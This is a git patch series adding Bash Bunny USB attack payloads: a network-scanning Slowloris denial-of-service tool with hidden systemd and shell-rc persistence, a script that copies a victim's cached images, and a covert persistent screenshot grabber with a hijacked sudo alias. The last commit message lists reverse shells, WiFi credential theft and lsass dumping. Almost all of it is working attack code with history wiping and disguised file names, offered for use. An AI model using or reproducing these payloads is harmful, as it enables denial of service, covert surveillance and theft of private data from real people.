From 55d34722fd51dcd7ddb66171de590feea1a79d26 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 19:53:03 +0530 Subject: [PATCH 1/4] uploading bunnyDOS (#509) * uploading bunnyDOS bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and performs DOS on it. * Delete payload.txt * Add files via upload --- payloads/library/execution/bunnyDOS/README.md | 37 +++ .../execution/bunnyDOS/bunnyDOS/payload.sh | 19 ++ .../execution/bunnyDOS/bunnyDOS/systemIO | 222 ++++++++++++++++++ .../library/execution/bunnyDOS/payload.txt | 51 ++++ 4 files changed, 329 insertions(+) create mode 100644 payloads/library/execution/bunnyDOS/README.md create mode 100644 payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh create mode 100644 payloads/library/execution/bunnyDOS/bunnyDOS/systemIO create mode 100644 payloads/library/execution/bunnyDOS/payload.txt
diff --git a/payloads/library/execution/bunnyDOS/README.md b/payloads/library/execution/bunnyDOS/README.md new file mode 100644
index 00000000..433d825e
--- /dev/null
+++ b/payloads/library/execution/bunnyDOS/README.md
@@ -0,0 +1,37 @@
+## About:
+* Title: bunnyDOS
+* Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## bunnyDOS: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and DOS it. Inject payload into multiple systems in network for robust DDOS.
+
+### Features:
+* Auto scan Network.
+* Capable for DDOS.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning it(this helps to reduce physical access time as network can be large).
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| bunnyDOS/ | /payloads/libray/ |
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh new file mode 100644
index 00000000..eeb3f5f8
--- /dev/null
+++ b/payloads/library/execution/bunnyDOS/bunnyDOS/payload.sh
@@ -0,0 +1,19 @@
+#!/bin/bash
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+ip=$(ip -o -f inet addr show | awk '/scope global/ {print $4}')
+open=$(nmap -p 80 $ip -q -oG - | grep open | awk '{print $2}' | awk '{printf("%s ",$0)} END { printf "\n" }')
+mkdir /var/tmp/.system/
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System IO handler.\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/sysHandler -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/libSystemIO.service
+cp -r $mntt/payloads/library/bunnyDOS/systemIO /var/tmp/.system/
+chmod +x /var/tmp/.system/systemIO
+for i in $open
+do
+ echo "/var/tmp/.system/./systemIO $i -p 80 -s 500" >> /var/tmp/.system/sysHandler
+done
+chmod +x /var/tmp/.system/sysHandler
+systemctl --user start libSystemIO.service
+echo -e "#\!/bin/bash\nls -a | grep 'zshrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.zshrc\nfi\n\nls -a | grep 'bashrc' &> /dev/null\nif [ $? = 0 ]; then\n\techo systemctl --user start --now libSystemIO.service >> ~/.bashrc\nfi" > ~/tmmmp
+chmod +x ~/tmmmp && ~/./tmmmp && rm tmmmp && rm /tmp/payload.sh && exit
diff --git a/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO new file mode 100644
index 00000000..554a5035
--- /dev/null
+++ b/payloads/library/execution/bunnyDOS/bunnyDOS/systemIO
@@ -0,0 +1,222 @@
+#!/usr/bin/env python3
+import argparse
+import logging
+import random
+import socket
+import sys
+import time
+
+parser = argparse.ArgumentParser(
+ description="Slowloris, low bandwidth stress test tool for websites"
+)
+parser.add_argument("host", nargs="?", help="Host to perform stress test on")
+parser.add_argument(
+ "-p", "--port", default=80, help="Port of webserver, usually 80", type=int
+)
+parser.add_argument(
+ "-s",
+ "--sockets",
+ default=150,
+ help="Number of sockets to use in the test",
+ type=int,
+)
+parser.add_argument(
+ "-v",
+ "--verbose",
+ dest="verbose",
+ action="store_true",
+ help="Increases logging",
+)
+parser.add_argument(
+ "-ua",
+ "--randuseragents",
+ dest="randuseragent",
+ action="store_true",
+ help="Randomizes user-agents with each request",
+)
+parser.add_argument(
+ "-x",
+ "--useproxy",
+ dest="useproxy",
+ action="store_true",
+ help="Use a SOCKS5 proxy for connecting",
+)
+parser.add_argument(
+ "--proxy-host", default="127.0.0.1", help="SOCKS5 proxy host"
+)
+parser.add_argument(
+ "--proxy-port", default="8080", help="SOCKS5 proxy port", type=int
+)
+parser.add_argument(
+ "--https",
+ dest="https",
+ action="store_true",
+ help="Use HTTPS for the requests",
+)
+parser.add_argument(
+ "--sleeptime",
+ dest="sleeptime",
+ default=15,
+ type=int,
+ help="Time to sleep between each header sent.",
+)
+parser.set_defaults(verbose=False)
+parser.set_defaults(randuseragent=False)
+parser.set_defaults(useproxy=False)
+parser.set_defaults(https=False)
+args = parser.parse_args()
+
+if len(sys.argv) <= 1:
+ parser.print_help()
+ sys.exit(1)
+
+if not args.host:
+ print("Host required!")
+ parser.print_help()
+ sys.exit(1)
+
+if args.useproxy:
+ # Tries to import to external "socks" library
+ # and monkey patches socket.socket to connect over
+ # the proxy by default
+ try:
+ import socks
+
+ socks.setdefaultproxy(
+ socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port
+ )
+ socket.socket = 
socks.socksocket
+ logging.info("Using SOCKS5 proxy for connecting...")
+ except ImportError:
+ logging.error("Socks Proxy Library Not Available!")
+
+if args.verbose:
+ logging.basicConfig(
+ format="[%(asctime)s] %(message)s",
+ datefmt="%d-%m-%Y %H:%M:%S",
+ level=logging.DEBUG,
+ )
+else:
+ logging.basicConfig(
+ format="[%(asctime)s] %(message)s",
+ datefmt="%d-%m-%Y %H:%M:%S",
+ level=logging.INFO,
+ )
+
+
+def send_line(self, line):
+ line = f"{line}\r\n"
+ self.send(line.encode("utf-8"))
+
+
+def send_header(self, name, value):
+ self.send_line(f"{name}: {value}")
+
+
+if args.https:
+ logging.info("Importing ssl module")
+ import ssl
+
+ setattr(ssl.SSLSocket, "send_line", send_line)
+ setattr(ssl.SSLSocket, "send_header", send_header)
+
+list_of_sockets = []
+user_agents = [
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
+ "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 
Safari/537.36 Edge/14.14393"
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+ "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
+ "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
+ "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
+ "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
+ "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
+]
+
+setattr(socket.socket, "send_line", send_line)
+setattr(socket.socket, "send_header", send_header)
+
+
+def init_socket(ip):
+ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.settimeout(4)
+
+ if args.https:
+ ctx = ssl.create_default_context()
+ s = ctx.wrap_socket(s, server_hostname=args.host)
+
+ s.connect((ip, args.port))
+
+ s.send_line(f"GET /?{random.randint(0, 2000)} HTTP/1.1")
+
+ ua = 
user_agents[0]
+ if args.randuseragent:
+ ua = random.choice(user_agents)
+
+ s.send_header("User-Agent", ua)
+ s.send_header("Accept-language", "en-US,en,q=0.5")
+ return s
+
+
+def main():
+ ip = args.host
+ socket_count = args.sockets
+ logging.info("Attacking %s with %s sockets.", ip, socket_count)
+
+ logging.info("Creating sockets...")
+ for _ in range(socket_count):
+ try:
+ logging.debug("Creating socket nr %s", _)
+ s = init_socket(ip)
+ except socket.error as e:
+ logging.debug(e)
+ break
+ list_of_sockets.append(s)
+
+ while True:
+ try:
+ logging.info(
+ "Sending keep-alive headers... Socket count: %s",
+ len(list_of_sockets),
+ )
+ for s in list(list_of_sockets):
+ try:
+ s.send_header("X-a", random.randint(1, 5000))
+ except socket.error:
+ list_of_sockets.remove(s)
+
+ for _ in range(socket_count - len(list_of_sockets)):
+ logging.debug("Recreating socket...")
+ try:
+ s = init_socket(ip)
+ if s:
+ list_of_sockets.append(s)
+ except socket.error as e:
+ logging.debug(e)
+ break
+ logging.debug("Sleeping for %d seconds", args.sleeptime)
+ time.sleep(args.sleeptime)
+
+ except (KeyboardInterrupt, SystemExit):
+ logging.info("Stopping Slowloris")
+ break
+
+
+if __name__ == "__main__":
+ main()
diff --git a/payloads/library/execution/bunnyDOS/payload.txt b/payloads/library/execution/bunnyDOS/payload.txt new file mode 100644
index 00000000..646fe1f0
--- /dev/null
+++ b/payloads/library/execution/bunnyDOS/payload.txt
@@ -0,0 +1,51 @@
+# Description: bunnyDOS payload intelligently search target's network for open http(configurable for https) ports and executes DOS it.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: Unix-like operating systems with systemd.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/bunnyDOS/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh \&
+Q ENTER
+Q STRING disown
+Q ENTER
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
From 46d069c0a9881d3aadd70e864f8cde0f88cbd632 Mon Sep 17 00:00:00 2001 From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 19:55:24 +0530 Subject: [PATCH 2/4] uploaded imagesOfYore (#510) * uploaded imagesOfYore imagesOfYore payload steals every image that target ever had in his disk. * Delete payload.txt * uploading imagesOfYore --- .../exfiltration/imagesOfYore/README.md | 38 +++++++++++++++ .../imagesOfYore/imagesOfYore/payload.sh | 9 ++++ .../exfiltration/imagesOfYore/payload.txt | 47 +++++++++++++++++++ 3 files changed, 94 insertions(+) create mode 100644 payloads/library/exfiltration/imagesOfYore/README.md create mode 100644 payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh create mode 100644 payloads/library/exfiltration/imagesOfYore/payload.txt
diff --git a/payloads/library/exfiltration/imagesOfYore/README.md b/payloads/library/exfiltration/imagesOfYore/README.md new file mode 100644
index 00000000..f79725bf
--- /dev/null
+++ b/payloads/library/exfiltration/imagesOfYore/README.md
@@ -0,0 +1,38 @@
+## About:
+* Title: imagesOfYore
+* Description: imagesOfYore payload steals every image that target ever had in his disk.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Exfiltration
+* Target: Unix-like operating systems.
+* Attackmodes: HID, Storage
+
+## imagesOfYore: Taking advantaged of cached images, imagesOfYore is simple payload which steals every image that target ever had in his disk.
+
+### Features:
+* Sotres all images(curently stored on disk and deleted too).
+* Extremly fast zstd compression for transfering images.
+
+### Payload Workflow:
+* Stop storing histroy.
+* Auto Mounting bunny.
+* Transfering payload script.
+* Executing script in background and disowning
+* Unmounting bunny.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| payload.txt | /payloads/switch1/ |
+| imagesOfYore/ | /payloads/libray/ |
+
+### Note:
+* Create directory named `imagesOfYore` in `/loot/` for storing loot.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh new file mode 100644
index 00000000..e77f814c
--- /dev/null
+++ b/payloads/library/exfiltration/imagesOfYore/imagesOfYore/payload.sh
@@ -0,0 +1,9 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cd ~/.cache && tar --zstd -cf $mntt/loot/imagesOfYore/thumbnails.tar.zst thumbnails
+udisksctl unmount -b /dev/$disk
+rm /tmp/script
diff --git a/payloads/library/exfiltration/imagesOfYore/payload.txt b/payloads/library/exfiltration/imagesOfYore/payload.txt new file mode 100644
index 00000000..a1d2e914
--- /dev/null
+++ b/payloads/library/exfiltration/imagesOfYore/payload.txt
@@ -0,0 +1,47 @@
+# Title: imagesOfYore
+# Description: imagesOfYore payload steals every image that target ever had in his disk.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Exfiltration
+# Target: Unix-like operating systems.
+# Attackmodes: HID, Storage
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/imagesOfYore/payload.sh /tmp/script
+Q ENTER
+Q STRING chmod +x /tmp/script
+Q ENTER
+Q STRING /tmp/./script \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
+LED FINISH
From 614b70bb8fab62bb738c358dd9aad4fe0f6c84da Mon Sep 17 00:00:00 2001
From: drapl0n <87269662+drapl0n@users.noreply.github.com> Date: Fri, 8 Apr 2022 20:01:30 +0530 Subject: [PATCH 3/4] Uploading ScreenGrab (#511) * uploading screenGrab screenGrab payload captures snap shots of target's screen periodically and store them into bunny. * Uploading payload --- .../library/execution/ScreenGrab/README.md | 55 ++++++++++++++++++ .../ScreenGrab/screenGrab/payload.sh | 18 ++++++ .../execution/ScreenGrab/screenGrab/shell | 12 ++++ .../execution/ScreenGrab/screenGrab/systemBus | 5 ++ .../execution/ScreenGrab/switch1/payload.txt | 56 +++++++++++++++++++ .../execution/ScreenGrab/switch2/payload.txt | 43 ++++++++++++++ 6 files changed, 189 insertions(+) create mode 100644 payloads/library/execution/ScreenGrab/README.md create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/payload.sh create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/shell create mode 100644 payloads/library/execution/ScreenGrab/screenGrab/systemBus create mode 100644 payloads/library/execution/ScreenGrab/switch1/payload.txt create mode 100644 payloads/library/execution/ScreenGrab/switch2/payload.txt
diff --git a/payloads/library/execution/ScreenGrab/README.md b/payloads/library/execution/ScreenGrab/README.md new file mode 100644
index 00000000..f3503171
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/README.md
@@ -0,0 +1,55 @@
+## About:
+* Title: screenGrab
+* Description: screenGrab payload captures snap shots of target's screen periodically and store them into bunny.
+* AUTHOR: drapl0n
+* Version: 1.0
+* Category: Execution
+* Target: Unix-like operating systems with systemd.
+* Attackmodes: HID, Storage
+
+## screenGrab: screenGrab payload is divided into two modules, First capture snap shots and Second stores them in bunny.
+
+### Features:
+* Robust Payload for capturing snap shots of target's screen.
+* No additional dependencies required.
+* Persistent.
+* Autostart payload on boot.
+
+### Payload:
+* Payload is divided into two modules:
+1) Deployment: In this stage payload is deployed in targets system.
+2) Exfiltration: Storing saved loot from targets system in bunny.
+
+### Payload Script's Workflow:
+* Stop storing histroy.
+* Grep bunny's mount point of bunny.
+* Creating hidden directory in /var/tmp/..... for obfuscation.
+* Copying ffmpeg and snap shot capturing mechanism in target's system.
+* Creating systemd service for persistance and triggering mechanism for autostart.
+
+### Changes to be made:
+* Change time interval of capturing snapshots, default time interval is 120 secs. Make changes in `systemBus` on line number `4`.
+
+### LED Status:
+* `SETUP` : MAGENTA
+* `ATTACK` : YELLOW
+* `FINISH` : GREEN
+
+### Note:
+* Download pre compiled static build of ffmpeg from: https://github.com/drapl0n/temp/releases/download/ffmpeg/ffmpeg and move it in screenGrab directory.
+* Due to big size of binary, it is not provided in this repo.
+* Craete directory name `screenGrab` in `/loot/` for storing captured images.
+
+### Directory Structure of payload components:
+| FileName | Directory |
+| -------------- | ----------------------------- |
+| switch1/payload.txt | /payloads/switch1/ |
+| switch2/payload.txt | /payloads/switch2/ |
+| screenGrab/ | /payloads/libray/ |
+
+### Usage:
+1. Deploy first payload during absence of target using `switch1`.
+2. 
Execute second payload during absence of target to store captured snapshots in bunny using `switch2`.
+
+#### Support me if you like my work:
+* https://twitter.com/drapl0n
diff --git a/payloads/library/execution/ScreenGrab/screenGrab/payload.sh b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh new file mode 100644
index 00000000..ea0ff7a6
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/screenGrab/payload.sh
@@ -0,0 +1,18 @@
+#!/bin/bash
+unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
+mkdir /var/tmp/.system
+lol=$(lsblk | grep 1.8G)
+disk=$(echo $lol | awk '{print $1}')
+mntt=$(lsblk | grep $disk | awk '{print $7}')
+cp -r $mntt/payloads/library/screenGrab/ffmpeg /var/tmp/.system/
+chmod +x /var/tmp/.system/ffmpeg
+mkdir /var/tmp/.system/sysLog
+cp -r $mntt/payloads/library/screenGrab/systemBus /var/tmp/.system/systemBus
+chmod +x /var/tmp/.system/systemBus
+mkdir -p ~/.config/systemd/user
+echo -e "[Unit]\nDescription= System BUS handler\n\n[Service]\nExecStart=/bin/bash /var/tmp/.system/systemBus -no-browser\nRestart=on-failure\nSuccessExitStatus=3 4\nRestartForceExitStatus=3 4\n\n[Install]\nWantedBy=multi-user.target" > ~/.config/systemd/user/systemBUS.service
+systemctl --user daemon-reload
+systemctl --user enable --now systemBUS.service
+systemctl --user start --now systemBUS.service
+cp -r $mntt/payloads/library/screenGrab/shell /tmp/
+chmod +x /tmp/shell && /tmp/./shell && rm /tmp/shell
diff --git a/payloads/library/execution/ScreenGrab/screenGrab/shell b/payloads/library/execution/ScreenGrab/screenGrab/shell new file mode 100644
index 00000000..2b46e3d3
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/screenGrab/shell
@@ -0,0 +1,12 @@
+#!/bin/bash
+ls -a ~/ | grep 'zshrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.zshrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.zshrc
+fi
+
+ls -a ~/ | grep 'bashrc' &> /dev/null
+if [ $? = 0 ]; then
+ echo -e "alias sudo='bash /var/tmp/.system/systemMgr && sudo'" >> ~/.bashrc
+ echo "systemctl --user enable --now systemBUS.service && systemctl --user restart systemBUS.service" >> ~/.bashrc
+fi
diff --git a/payloads/library/execution/ScreenGrab/screenGrab/systemBus b/payloads/library/execution/ScreenGrab/screenGrab/systemBus new file mode 100644
index 00000000..2f0c2b77
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/screenGrab/systemBus
@@ -0,0 +1,5 @@
+while true;
+do
+ /var/tmp/.system/./ffmpeg -f x11grab -video_size $(xdpyinfo | grep dimensions | cut -d" " -f7) -i $DISPLAY -vframes 1 /var/tmp/.system/sysLog/$(date +%Y%m%d-%H%M%S).png
+ sleep 120
+done
diff --git a/payloads/library/execution/ScreenGrab/switch1/payload.txt b/payloads/library/execution/ScreenGrab/switch1/payload.txt new file mode 100644
index 00000000..b8fafe1a
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/switch1/payload.txt
@@ -0,0 +1,56 @@
+# Title: screenGrab
+# Description: screenGrab payload captures snap shot's of target's screen periodically.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+Q STRING cp -r '$mntt'/payloads/library/screenGrab/payload.sh /tmp/
+Q ENTER
+Q STRING chmod +x /tmp/payload.sh
+Q ENTER
+Q STRING /tmp/./payload.sh
+Q ENTER
+Q DELAY 12000
+Q STRING rm /tmp/payload.sh
+Q ENTER
+Q DELAY 500
+
+# [Unmounting BashBunny]
+Q STRING udisksctl unmount -b /dev/'$disk'
+Q ENTER
+Q DELAY 500
+Q STRING exit
+Q ENTER
+LED FINISH
diff --git a/payloads/library/execution/ScreenGrab/switch2/payload.txt b/payloads/library/execution/ScreenGrab/switch2/payload.txt new file mode 100644
index 00000000..06e59f37
--- /dev/null
+++ b/payloads/library/execution/ScreenGrab/switch2/payload.txt
@@ -0,0 +1,43 @@
+# Title: screenGrab
+# Description: screenGrab payload's exfilteration module to move captured snapshots to bunny.
+# AUTHOR: drapl0n
+# Version: 1.0
+# Category: Execution
+# Target: GNU/Linux operating systems with systemd.
+# Attackmodes: HID, Storage.
+
+LED SETUP
+ATTACKMODE STORAGE HID
+GET SWITCH_POSITION
+LED ATTACK
+Q DELAY 1000
+Q CTRL-ALT t
+Q DELAY 1000
+
+# [Prevent storing history]
+Q STRING unset HISTFILE
+Q ENTER
+Q DELAY 200
+
+# [Fetching BashBunny's block device]
+Q STRING lol='$(lsblk | grep 1.8G)'
+Q ENTER
+Q DELAY 100
+Q STRING disk='$(echo $lol | awk '\'{print\ '$1'}\'\)''
+Q ENTER
+Q DELAY 200
+
+# [Mounting BashBunny]
+Q STRING udisksctl mount -b /dev/'$disk' /tmp/tmppp
+Q ENTER
+Q DELAY 2000
+Q STRING mntt='$(lsblk | grep $disk | awk '\'{print\ '$7'}\'\)''
+Q ENTER
+Q DELAY 500
+
+# [transfering payload script]
+# create directory named screenGrab in /loot/
+Q STRING mv /var/tmp/.system/sysLog/* '$mntt'/loot/screenGrab/ \&
+Q ENTER
+Q STRING disown \&\& exit
+Q ENTER
From e11f9281cbb311ed7cff83e0a8c9f32353604227 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com> Date: Fri, 8 Apr 2022 16:43:17 +0200 Subject: [PATCH 4/4] Updated ReadMe (#512) MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit * Uploaded ReverseBunny Obfuscated reverse shell via powershell * Uploaded WifiSnatch Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇 * Update ReverseBunny.txt Changed payload to evade Windows Defender * Update payload.txt Added new "Eject Method" - props to Night(9o3) * Update README.md * Deleted ReverseBunny.txt Deleted because of higher risk to get caught by AV * Updated ReverseBunny to version 1.2 Updated ReverseBunny to version 1.2. - Deleted payload on disk because of AV - Added custom shell design * Updated ReverseBunny to version 1.2 Updated README for ReverseBunny update * Updated payload fixed some stupid left overs <3 * Uploaded pingUinBunny a reverse shell using icmp * Delete payloads/library/remote_access/switch1 directory * Uploaded pingUinBunny A reverse shell using icmp * Update README.md * Update README.md * Updated to PingZhell * Update Bunny.pl * Update README.md * Update README.md * Update payload.txt * Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl * Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 * Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md * Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt * Update payload.txt * Update README.md * Update README.md * Update Bunny.pl * Created ProcDumpBunny Dump lsass.exe with a renamed version of procdump and get the users hashes with Mimikatz * Update README.md * Update payload.txt * Updated ReverseBunny Fixed wrong DELAY commands * 
